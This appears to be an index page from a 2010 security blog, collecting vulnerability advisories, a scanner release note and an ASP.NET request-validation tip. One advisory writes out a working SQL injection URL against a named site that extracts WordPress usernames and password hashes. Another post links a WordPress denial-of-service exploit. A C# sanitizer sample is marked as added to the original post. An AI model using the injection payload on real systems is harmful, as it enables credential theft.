Acunetix v6.5 build 20100303 released

by kad1r 4. March 2010 12:45

New Features:
Added new option to export results to HTTP Fuzzer
Test for XML External Entity Injection
Test for XML Injection
Improved directory traversal vulnerability check
Improved Cross-site Scripting (XSS) vulnerability checks
Fixed: access violation when the application exits
Fixed: access violation when protocol was terminated in NotifyCaller function in LSR
Fixed: AbortVulnXML OnFirstAlert was not imported from settings
Fixed: Form values were not encoded correctly when submitted from JavaScript (CSA engine)

How to upgrade: When Acunetix WVS starts, a pop-up window automatically notifies you that a more recent build is available for download. To download the latest build, navigate to the General > Program Updates node in the Tools explorer and click Download and Install new build.


Released | Security

WordPress 0.16 Copperleaf Photolog SQL injection

by kad1r 25. February 2010 11:50
SecurityAlert: 7032
CVE: CVE-2010-0673
CWE: CWE-89
SecurityRisk: High
Remote Exploit: Yes
Local Exploit: No
Victim interaction required: No
Exploit Available: Yes
Credit: kaMtiEz
Published: 25.02.2010
Affected Software: copperleaf:photolog:0.16
[+] Demo Vendor
http://www.copperleaf.org/wp-content/themes/limon/cplphoto.php?postid=416+a nd+1=1+union+all+select+1,2,concat(user_login,0x3a,user_pass),4,5,6,7,8,9,1 0,11,12+from+wp_users--&id=2097

ASP.Net Html Post Security

by kad1r 11. February 2010 12:28

If you use a rich-text editor such as FCKeditor or TinyMCE, you will sometimes get the "potentially dangerous form value" error. ASP.NET reports the posted value as dangerous, but sometimes it is not. When you trust your code and want to remove this error, add ValidateRequest="false" to the page. This setting applies only to the page you add it to. If you want to remove the check for all pages, add <pages validateRequest="false" /> to the web.config file, between the system.web tags. With the check disabled, validating and encoding the posted HTML is up to your own code.
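One way to handle the editor's HTML on a page where ValidateRequest="false" is set, shown as an added example that is not part of the original post: encode the whole value, then restore only a short allow-list of attribute-free tags. The form field name `editorHtml`, the `EditPost` page class and the `EditorHtml` helper are hypothetical.

```csharp
// Added example, not code from the original post.
// Assumes a Web Forms page with ValidateRequest="false" and a rich-text
// editor that posts its content in a form field named "editorHtml" (hypothetical).
using System;
using System.Text;
using System.Web;

public static class EditorHtml
{
    // Only these tags survive, and only in their exact attribute-free,
    // lower-case form, so href, style and on* handlers never get through.
    private static readonly string[] AllowedTags =
        { "b", "i", "u", "p", "ul", "ol", "li" };

    public static string Sanitize(string rawHtml)
    {
        if (string.IsNullOrEmpty(rawHtml)) return string.Empty;

        // Step 1: encode everything, so all markup characters become entities.
        StringBuilder sb = new StringBuilder(HttpUtility.HtmlEncode(rawHtml));

        // Step 2: turn back only the allow-listed opening and closing tags.
        foreach (string tag in AllowedTags)
        {
            sb.Replace("&lt;" + tag + "&gt;", "<" + tag + ">");
            sb.Replace("&lt;/" + tag + "&gt;", "</" + tag + ">");
        }
        sb.Replace("&lt;br /&gt;", "<br />");
        sb.Replace("&lt;br&gt;", "<br />");
        return sb.ToString();
    }
}

public partial class EditPost : System.Web.UI.Page
{
    // Rendered by the markup with <%= SafeHtml %>.
    protected string SafeHtml { get; private set; }

    protected void Page_Load(object sender, EventArgs e)
    {
        if (!IsPostBack) return;
        // Request validation is off for this page, so sanitize before use.
        SafeHtml = EditorHtml.Sanitize(Request.Form["editorHtml"]);
    }
}
```

Anything the editor emits outside the allow-list, such as links, images or styled spans, stays encoded and shows up as literal text.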

 

WordPress 2.9 plugin wp-wall (XSS)

by kad1r 13. January 2010 13:54
Topic: WordPress 2.9 plugin wp-wall (XSS) Cross Site Scripting Vulnerability
ExploitAlert: 7683
Credit: Cair3x
Date: 12.01.2010

Source


Security

Windows Live Messenger 2009 ActiveX DoS Vulnerability

by kad1r 11. January 2010 13:34

# Title: Windows Live Messenger 2009 ActiveX DoS Vulnerability
# EDB-ID: 11070
# CVE-ID: ()
# OSVDB-ID: ()
# Author: HACKATTACK IT SECURITY GmbH
# Published: 2010-01-08
# Verified: yes
# Download Exploit Code
# Download N/A


Security

WordPress 2.9 0Day DoS

by kad1r 31. December 2009 11:43
Here is the WordPress DoS attack. It's for version 2.9. Enjoy.
http://codepaste.net/nbzr3k


Security

WordPress and Pyrmont V2. SQL Injection Vulnerability

by kad1r 31. December 2009 10:58

Affected Software: imotta:pyrmont_plugin:2
SecurityRisk: Medium
Remote Exploit : Yes
Local Exploit : No
Victim interaction required : No
Exploit Available : No
Credit : Gamoscu
Published : 30.12.2009
http://securityreason.com/securityalert/6880

Security Videos For Your Life ;)

by kad1r 25. December 2009 14:33
http://www.milw0rm.com/video/
http://whitehatworld.com/archives.html
http://www.hak5.org/category/episodes
http://www.theacademypro.com/index.php
http://www.irongeek.com/i.php?page=security/hackingillustrated
http://www.securitytube.net/
http://www.rmccurdy.com/scripts/videos/
http://www.veryangrytoad.com/categories/8/
http://m3gabyt3.blip.tv/posts?view=archive&nsfw=dc
http://hopetracker.donthax.me/
http://adventuresinsecurity.com/resources
http://www.security-freak.net/videos.html
http://www.youtube.com/helpnetsecurity?gl=GB&hl=en-GB
http://vimeo.com/user595761/videos/sort:date
http://blip.tv/search?q=backtrack&x=0&y=0
http://www.knowledgecave.com/modules.php?name=Video_Stream
http://www.youtube.com/theacademypro
http://infinityexists.com/
http://www.youtube.com/user/ImpervaChannel
http://vimeo.com/pauldotcom/videos
http://vimeo.com/user1781217/videos/sort:date
http://www.hackerscenter.com/index.php?/Video/General/
http://securityoverride.com/about/
http://www.social-engineer.org/blog/resources/
http://pentest.cryptocity.net/
http://yehg.net/lab/pr0js/training/webgoat.php


Security


